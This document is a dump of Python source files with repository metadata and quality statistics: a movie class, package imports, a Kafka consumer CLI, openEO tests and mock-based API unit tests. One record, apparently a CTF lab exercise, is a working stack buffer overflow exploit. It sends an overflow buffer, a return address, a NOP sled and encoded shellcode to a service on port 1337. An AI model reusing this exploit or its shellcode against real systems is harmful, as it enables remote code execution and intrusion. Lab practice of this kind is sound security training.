| max_stars | `Python_Files/murach/solutions/ch14/movies/objects.py` | `Interloper2448/BCGPortfolio` | `c4c160a835c64c8d099d44c0995197f806ccc824` | ["MIT"] | null | null | null |
| max_issues | `Python_Files/murach/solutions/ch14/movies/objects.py` | `Interloper2448/BCGPortfolio` | `c4c160a835c64c8d099d44c0995197f806ccc824` | ["MIT"] | null | null | null |
| max_forks | `Python_Files/murach/solutions/ch14/movies/objects.py` | `Interloper2448/BCGPortfolio` | `c4c160a835c64c8d099d44c0995197f806ccc824` | ["MIT"] | null | null | null |

**content:**

```python
class Movie:
def __init__(self, name="", year=1901):
self.name = name
self.year = year
def getStr(self):
return self.name + " (" + str(self.year) + ")"
```

**stats:** avg_line_length 23.25 | max_line_length 55 | alphanum_fraction 0.532258

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
23 | 186 | 4.130435 | 0.478261 | 0.252632 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031008 | 0.306452 | 186 | 7 | 56 | 26.571429 | 0.705426 | 0 | 0 | 0 | 0 | 0 | 0.016129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.166667 | 0.666667 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `05e70bf4fcafed340bac69f51837c437a43b38d8` | **size:** 93 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `utensor_cgen/backend/utensor/code_generator/__init__.py` | `uTensor/utensor_cgen` | `eccd6859028d0b6a350dced25ea72ff02faaf9ad` | ["Apache-2.0"] | 49 | 2018-01-06T12:57:56.000Z | 2021-09-03T09:48:32.000Z |
| max_issues | `utensor_cgen/backend/utensor/code_generator/__init__.py` | `uTensor/utensor_cgen` | `eccd6859028d0b6a350dced25ea72ff02faaf9ad` | ["Apache-2.0"] | 101 | 2018-01-16T19:24:21.000Z | 2021-11-10T19:39:33.000Z |
| max_forks | `utensor_cgen/backend/utensor/code_generator/__init__.py` | `uTensor/utensor_cgen` | `eccd6859028d0b6a350dced25ea72ff02faaf9ad` | ["Apache-2.0"] | 32 | 2018-02-15T19:39:50.000Z | 2020-11-26T22:32:05.000Z |

**content:**

```python
from .legacy import uTensorLegacyCodeGenerator
from .rearch import uTensorRearchCodeGenerator
```

**stats:** avg_line_length 46.5 | max_line_length 46 | alphanum_fraction 0.903226

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
8 | 93 | 10.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 93 | 2 | 47 | 46.5 | 0.976744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `af19bd3d785d56642d7b3f0a837d7edbf7bf7261` | **size:** 1,975 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `Stack-Based-BOF/THM-BOF-1/exploit.py` | `Rob-VanDusen/ctf-notes` | `c88dc7597bca1bcda88d5ef07f38dcb50b89be59` | ["CC0-1.0"] | null | null | null |
| max_issues | `Stack-Based-BOF/THM-BOF-1/exploit.py` | `Rob-VanDusen/ctf-notes` | `c88dc7597bca1bcda88d5ef07f38dcb50b89be59` | ["CC0-1.0"] | null | null | null |
| max_forks | `Stack-Based-BOF/THM-BOF-1/exploit.py` | `Rob-VanDusen/ctf-notes` | `c88dc7597bca1bcda88d5ef07f38dcb50b89be59` | ["CC0-1.0"] | null | null | null |

**content:**

```python
#!/usr/bin/env python3
import socket
ip = "10.10.16.223"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62" # 625011AF
padding = "\x90" * 16
payload = ("\xbe\x13\xbf\x94\xb6\xdb\xd7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x70\x0e\x03\x63\xb1\x76\x43\x7f\x25\xf4"
"\xac\x7f\xb6\x99\x25\x9a\x87\x99\x52\xef\xb8\x29\x10\xbd\x34"
"\xc1\x74\x55\xce\xa7\x50\x5a\x67\x0d\x87\x55\x78\x3e\xfb\xf4"
"\xfa\x3d\x28\xd6\xc3\x8d\x3d\x17\x03\xf3\xcc\x45\xdc\x7f\x62"
"\x79\x69\x35\xbf\xf2\x21\xdb\xc7\xe7\xf2\xda\xe6\xb6\x89\x84"
"\x28\x39\x5d\xbd\x60\x21\x82\xf8\x3b\xda\x70\x76\xba\x0a\x49"
"\x77\x11\x73\x65\x8a\x6b\xb4\x42\x75\x1e\xcc\xb0\x08\x19\x0b"
"\xca\xd6\xac\x8f\x6c\x9c\x17\x6b\x8c\x71\xc1\xf8\x82\x3e\x85"
"\xa6\x86\xc1\x4a\xdd\xb3\x4a\x6d\x31\x32\x08\x4a\x95\x1e\xca"
"\xf3\x8c\xfa\xbd\x0c\xce\xa4\x62\xa9\x85\x49\x76\xc0\xc4\x05"
"\xbb\xe9\xf6\xd5\xd3\x7a\x85\xe7\x7c\xd1\x01\x44\xf4\xff\xd6"
"\xab\x2f\x47\x48\x52\xd0\xb8\x41\x91\x84\xe8\xf9\x30\xa5\x62"
"\xf9\xbd\x70\x24\xa9\x11\x2b\x85\x19\xd2\x9b\x6d\x73\xdd\xc4"
"\x8e\x7c\x37\x6d\x24\x87\xd0\x98\xbd\xaf\xf8\xf5\xbf\xaf\xe9"
"\x59\x49\x49\x63\x72\x1f\xc2\x1c\xeb\x3a\x98\xbd\xf4\x90\xe5"
"\xfe\x7f\x17\x1a\xb0\x77\x52\x08\x25\x78\x29\x72\xe0\x87\x87"
"\x1a\x6e\x15\x4c\xda\xf9\x06\xdb\x8d\xae\xf9\x12\x5b\x43\xa3"
"\x8c\x79\x9e\x35\xf6\x39\x45\x86\xf9\xc0\x08\xb2\xdd\xd2\xd4"
"\x3b\x5a\x86\x88\x6d\x34\x70\x6f\xc4\xf6\x2a\x39\xbb\x50\xba"
"\xbc\xf7\x62\xbc\xc0\xdd\x14\x20\x70\x88\x60\x5f\xbd\x5c\x65"
"\x18\xa3\xfc\x8a\xf3\x67\x1c\x69\xd1\x9d\xb5\x34\xb0\x1f\xd8"
"\xc6\x6f\x63\xe5\x44\x85\x1c\x12\x54\xec\x19\x5e\xd2\x1d\x50"
"\xcf\xb7\x21\xc7\xf0\x9d")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")
```

**stats:** avg_line_length 39.5 | max_line_length 73 | alphanum_fraction 0.696709

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
422 | 1,975 | 3.255924 | 0.549763 | 0.008734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.257235 | 0.05519 | 1,975 | 49 | 74 | 40.306122 | 0.4791 | 0.01519 | 0 | 0 | 0 | 0.547619 | 0.773546 | 0.722594 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02381 | 0 | 0.02381 | 0.071429

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `af6f367d7cdaed06d634c9db91b020afc6d934e8` | **size:** 3,197 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `domba/clis/start.py` | `sofyan48/domba` | `fbd891ce69325d56774114eb6ef71c8d0f5ab428` | ["MIT"] | 1 | 2019-07-27T12:17:16.000Z | 2019-07-27T12:17:16.000Z |
| max_issues | `domba/clis/start.py` | `meongbego/domba` | `fbd891ce69325d56774114eb6ef71c8d0f5ab428` | ["MIT"] | null | null | null |
| max_forks | `domba/clis/start.py` | `meongbego/domba` | `fbd891ce69325d56774114eb6ef71c8d0f5ab428` | ["MIT"] | null | null | null |

**content:**

```python
from domba.clis.base import Base
from domba.libs import env_lib
from domba.libs import knot_lib
from domba.libs import kafka_lib
import os
class Start(Base):
"""
usage:
start slave
start master
Command :
Options:
-h --help Print usage
"""
def execute(self):
# knot_lib.utils.check_root()
broker_env = env_lib.utils.get_env_values_broker()
broker = broker_env['broker']+":"+broker_env['port']
topic = broker_env['topic']
group = broker_env['group']
flag = broker_env['flags']
if self.args['slave']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
if self.args['master']:
try:
knot_lib.utils.log_err("Connecting to broker : "+broker)
consumer = kafka_lib.get_kafka_consumer(broker, topic, group)
except Exception as e:
knot_lib.utils.log_err("Not Connecting to broker : "+broker)
knot_lib.utils.log_err("Error: "+ str(e))
exit()
try:
for message in consumer:
type_command = None
message = message.value
for i in message:
try:
type_command = message[i]['type']
except Exception as e:
print("Set Your Types Command")
if type_command == "general":
knot_lib.parsing_data_general(message, broker)
elif type_command == "cluster":
knot_lib.parsing_data_cluster(message, broker, flags=flag)
else:
print("Type Command Not Found")
except KeyboardInterrupt:
print("Exited")
# except Exception as e:
# env_lib.utils.log_err(str(e))
exit()
```

**stats:** avg_line_length 38.987805 | max_line_length 82 | alphanum_fraction 0.483891

**quality signals** (`qsc_*_quality_signal` columns, values as extracted):
320 | 3,197 | 4.65625 | 0.21875 | 0.056376 | 0.05906 | 0.075168 | 0.777181 | 0.747651 | 0.747651 | 0.747651 | 0.747651 | 0.747651 | 0 | 0 | 0.432906 | 3,197 | 82 | 83 | 38.987805 | 0.821842 | 0.079137 | 0 | 0.78125 | 0 | 0 | 0.099618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015625 | false | 0 | 0.078125 | 0 | 0.109375 | 0.09375

**signal flags** (unsuffixed `qsc_*` columns, values as extracted):
0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `af9cba96e04a6dafd8fe9ffe1a97e239f33fd7e2` | **size:** 188 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `improutils/__init__.py` | `ImprolabFIT/improutils` | `84666f88db594dd5d24cf946c635df37643ed309` | ["MIT"] | null | null | null |
| max_issues | `improutils/__init__.py` | `ImprolabFIT/improutils` | `84666f88db594dd5d24cf946c635df37643ed309` | ["MIT"] | null | null | null |
| max_forks | `improutils/__init__.py` | `ImprolabFIT/improutils` | `84666f88db594dd5d24cf946c635df37643ed309` | ["MIT"] | null | null | null |

**content:**

```python
from .other import *
from .acquisition import *
from .filtration import *
from .preprocessing import *
from .recognition import *
from .segmentation import *
from .visualisation import *
```

**stats:** avg_line_length 20.888889 | max_line_length 28 | alphanum_fraction 0.771277

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
21 | 188 | 6.904762 | 0.428571 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154255 | 188 | 8 | 29 | 23.5 | 0.91195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `afcfa7df8b6551e0c9178682429e9831edd629a5` | **size:** 1,767 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `tests/test_write_basic_udf.py` | `eodcgmbh/eodc-openeo-bindings` | `4e80eba036771a0c81359e1ac66862f1eead407b` | ["MIT"] | null | null | null |
| max_issues | `tests/test_write_basic_udf.py` | `eodcgmbh/eodc-openeo-bindings` | `4e80eba036771a0c81359e1ac66862f1eead407b` | ["MIT"] | 7 | 2020-02-18T17:12:31.000Z | 2020-09-24T07:19:04.000Z |
| max_forks | `tests/test_write_basic_udf.py` | `eodcgmbh/eodc-openeo-bindings` | `4e80eba036771a0c81359e1ac66862f1eead407b` | ["MIT"] | null | null | null |

**content:**

```python
"""
This test checks the input file generation of a basic job using a python UDF.
"""
import os
from eodc_openeo_bindings.job_writer.basic_writer import BasicJobWriter
def test_basic_python_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_python.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_python',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_python_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
def test_basic_r_udf(test_folder, out_filepath_basic, backend_processes, S2_filepaths_short):
evi_file = os.path.join(test_folder, 'process_graphs', 'udf_r.json')
BasicJobWriter().write_job(process_graph_json=evi_file, job_data='./output_udf_r',
process_defs=backend_processes, in_filepaths=S2_filepaths_short, output_filepath=out_filepath_basic)
with open(out_filepath_basic) as outfile:
out_content = outfile.read()
filepath_split = os.path.splitext(out_filepath_basic)[0]
filename = filepath_split.split(os.path.sep)[-1]
ref_filepath = os.path.join(os.environ['REF_JOBS'], filename + '_udf_r_ref.py')
with open(ref_filepath) as outfile:
ref_content = outfile.read()
assert out_content == ref_content
```

**stats:** avg_line_length 39.266667 | max_line_length 131 | alphanum_fraction 0.739106

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
249 | 1,767 | 4.875502 | 0.24498 | 0.072488 | 0.105437 | 0.026359 | 0.848435 | 0.848435 | 0.848435 | 0.848435 | 0.848435 | 0.848435 | 0 | 0.005402 | 0.161856 | 1,767 | 44 | 132 | 40.159091 | 0.814315 | 0.043577 | 0 | 0.615385 | 0 | 0 | 0.079073 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.153846 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `bbb7c8daf68cfc0db3531104ebe1585494d2cd41` | **size:** 192 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `jude_customization/jude_customization/doctype/atlantic_fluid_configuration/test_atlantic_fluid_configuration.py` | `mymi14s/jude_customization` | `6de7173a03cedf8c712c2d05453c821dff7eec58` | ["MIT"] | null | null | null |
| max_issues | `jude_customization/jude_customization/doctype/atlantic_fluid_configuration/test_atlantic_fluid_configuration.py` | `mymi14s/jude_customization` | `6de7173a03cedf8c712c2d05453c821dff7eec58` | ["MIT"] | null | null | null |
| max_forks | `jude_customization/jude_customization/doctype/atlantic_fluid_configuration/test_atlantic_fluid_configuration.py` | `mymi14s/jude_customization` | `6de7173a03cedf8c712c2d05453c821dff7eec58` | ["MIT"] | 2 | 2020-11-09T16:22:52.000Z | 2020-12-19T20:52:10.000Z |

**content:**

```python
# Copyright (c) 2021, Anthony Emmanuel, github.com/mymi14ss and Contributors
# See license.txt
# import frappe
import unittest
class TestAtlanticFluidConfiguration(unittest.TestCase):
pass
```

**stats:** avg_line_length 21.333333 | max_line_length 76 | alphanum_fraction 0.807292

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
22 | 192 | 7.045455 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035503 | 0.119792 | 192 | 8 | 77 | 24 | 0.881657 | 0.541667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `bbbf9065c2092f796276d52d4458d16e60c9b5cb` | **size:** 97 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `tadataka/__init__.py` | `IshitaTakeshi/DVO` | `2c5a3db1db7e651bfaa7808bbf79a6c1c6a42fc5` | ["Apache-2.0"] | 7 | 2019-12-20T07:19:11.000Z | 2021-07-22T03:25:12.000Z |
| max_issues | `tadataka/__init__.py` | `IshitaTakeshi/DVO` | `2c5a3db1db7e651bfaa7808bbf79a6c1c6a42fc5` | ["Apache-2.0"] | null | null | null |
| max_forks | `tadataka/__init__.py` | `IshitaTakeshi/DVO` | `2c5a3db1db7e651bfaa7808bbf79a6c1c6a42fc5` | ["Apache-2.0"] | null | null | null |

**content:**

```python
from tadataka.visual_odometry import VisualOdometry
from tadataka.camera import CameraParameters
```

**stats:** avg_line_length 32.333333 | max_line_length 51 | alphanum_fraction 0.896907

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
11 | 97 | 7.818182 | 0.727273 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082474 | 97 | 2 | 52 | 48.5 | 0.966292 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `bbed6bb7a92a7f22be0a1cdd4bf174a34f7f4719` | **size:** 7,655 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `tests/Monkeypatching/test_Api_monkeypatching_api_get_by_id.py` | `LudwikaMalinowska/Automated-Testing-Project2` | `f0868700af8d6b946768d67b3c1768c2447f1a60` | ["MIT"] | null | null | null |
| max_issues | `tests/Monkeypatching/test_Api_monkeypatching_api_get_by_id.py` | `LudwikaMalinowska/Automated-Testing-Project2` | `f0868700af8d6b946768d67b3c1768c2447f1a60` | ["MIT"] | null | null | null |
| max_forks | `tests/Monkeypatching/test_Api_monkeypatching_api_get_by_id.py` | `LudwikaMalinowska/Automated-Testing-Project2` | `f0868700af8d6b946768d67b3c1768c2447f1a60` | ["MIT"] | null | null | null |

**content** (this record is truncated; its stats and signal values are cut off in the source):

```python
import unittest
import requests
from assertpy import assert_that
from requests.exceptions import Timeout
from unittest.mock import Mock, patch
from src.Api import Api
from src.todos import todos
class TestApiMonkeyPatch(unittest.TestCase):
@patch('src.Api.Api', autospec=True)
def test_method_api_get_by_id_raises_timeout(self, mock_class):
mock_id = Mock()
mock_id.return_value = 1
mock_class.api_get_by_id.side_effect = Timeout
with self.assertRaises(Timeout):
mock_class.api_get_by_id(mock_id)
def test_method_api_get_by_id_assert_that_called_once(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id.assert_called_once()
def test_method_api_get_by_id_assert_that_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id(mock_id2)
mock_api.api_get_by_id.assert_called()
def test_method_api_get_by_id_assert_that_not_called(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id.assert_not_called()
def test_method_api_get_by_id_assert_that_called_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id.assert_called_with(mock_id)
def test_method_api_get_by_id_assert_that_called_once_with_id_1(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id.assert_called_once_with(mock_id)
def test_method_api_get_by_id_assert_that_response_equal_to_expected_userId_1_id_1_completed_false(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"data": todos[todo_id - 1], "status_code": 200}
response = mock_api.api_get_by_id(todo_id)
expected_todo = {
"userId": 1,
"id": 1,
"title": "delectus aut autem",
"completed": False
}
assert_that(response["data"]).is_equal_to(expected_todo)
def test_method_api_get_by_id_assert_that_response_contains_all_keys_userId_id_title_completed(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"data": todos[todo_id - 1], "status_code": 200}
response = mock_api.api_get_by_id(todo_id)
assert_that(response["data"]).contains_key("userId", "id", "title", "completed")
def test_method_api_get_by_id_assert_that_response_has_status_code_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"data": todos[todo_id - 1], "status_code": 200}
response = mock_api.api_get_by_id(todo_id)
assert_that(response).has_status_code(200)
def test_method_api_get_by_id_assert_that_response_dont_have_status_code_200(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 1
mock_api.api_get_by_id.return_value = {"status_code": 408}
response = mock_api.api_get_by_id(todo_id)
assert_that(response["status_code"]).is_not_equal_to(200)
def test_method_api_get_by_id_assert_that_not_called_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_api.api_get_by_id(mock_id)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_not_called()
def test_method_api_get_by_id_assert_that_called_once_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_called_once()
def test_method_api_get_by_id_assert_that_called_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_called_with(mock_id)
def test_api_get_by_id_monkeypatch_called_once_with_id_1_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
mock_id = Mock()
mock_id.return_value = 1
mock_id2 = Mock()
mock_id2.return_value = 2
mock_api.api_get_by_id(mock_id)
mock_api.api_get_by_id(mock_id2)
with self.assertRaises(AssertionError):
mock_api.api_get_by_id.assert_called_once_with(mock_id)
def test_method_api_get_by_id_no_parameter_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
with self.assertRaises(TypeError):
mock_api.api_get_by_id()
def test_method_api_get_by_id_assert_that_response_returns_ValueError_when_called_with_id_0_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 0
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = ValueError
assert_that(mock_api.api_get_by_id).raises(ValueError).when_called_with(todo_id)
def test_method_api_get_by_id_assert_that_response_returns_ValueError_when_called_with_id_300_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = 300
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = ValueError
assert_that(mock_api.api_get_by_id).raises(ValueError).when_called_with(todo_id)
def test_method_api_get_by_id_assert_that_response_returns_TypeError_when_called_with_id_not_int_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = "1"
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = TypeError
assert_that(mock_api.api_get_by_id).raises(TypeError).when_called_with(todo_id)
def test_method_api_get_by_id_assert_that_response_returns_AttributeError_when_called_with_id_None_exception(self):
with patch('src.Api.Api', autospec=True) as mock_api:
todo_id = None
mock_api.api_get_by_id.return_value = {"status_code": 408}
mock_api.api_get_by_id.side_effect = AttributeError
assert_that(mock_api.api_get_by_id).raises(AttributeError).when_called_with(todo_id)
if __name__ == '__main__':
unittest.main()
| 44.248555
| 119
| 0.678903
| 1,157
| 7,655
| 3.996543
| 0.070873
| 0.08045
| 0.107266
| 0.134083
| 0.847318
| 0.839533
| 0.821151
| 0.816176
| 0.807742
| 0.786548
| 0
| 0.014734
| 0.237492
| 7,655
| 173
| 120
| 44.248555
| 0.777454
| 0
| 0
| 0.622378
| 0
| 0
| 0.052116
| 0
| 0
| 0
| 0
| 0
| 0.27972
| 1
| 0.132867
| false
| 0
| 0.048951
| 0
| 0.188811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
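The test file above exercises unittest.mock.patch with autospec=True against src.Api.Api, configuring return values and side effects, then asserting on the recorded calls. A self-contained distillation of the core pattern; the Api stand-in below is hypothetical so the sketch runs without the original src package:

import unittest
from unittest.mock import patch

class Api:
    """Hypothetical stand-in for src.Api.Api so the sketch is self-contained."""
    def api_get_by_id(self, todo_id):
        raise NotImplementedError

class PatchSketch(unittest.TestCase):
    def test_configure_and_assert(self):
        # autospec=True makes the mock enforce the real call signature,
        # so the test fails if it drifts from the implementation.
        with patch(f"{__name__}.Api", autospec=True) as mock_api:
            mock_api.api_get_by_id.return_value = {"status_code": 200}
            response = mock_api.api_get_by_id(1)
            self.assertEqual(response["status_code"], 200)
            mock_api.api_get_by_id.assert_called_once_with(1)

if __name__ == "__main__":
    unittest.main()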
|
bbf5f66b6a4f40cea15c174917bd79930606ce25
| 189
|
py
|
Python
|
tests/controls/scroller.py
|
whitegreyblack/PyWin
|
78f3637b4c03c11d7f6ef15b20a1acf699d4be24
|
[
"MIT"
] | null | null | null |
tests/controls/scroller.py
|
whitegreyblack/PyWin
|
78f3637b4c03c11d7f6ef15b20a1acf699d4be24
|
[
"MIT"
] | null | null | null |
tests/controls/scroller.py
|
whitegreyblack/PyWin
|
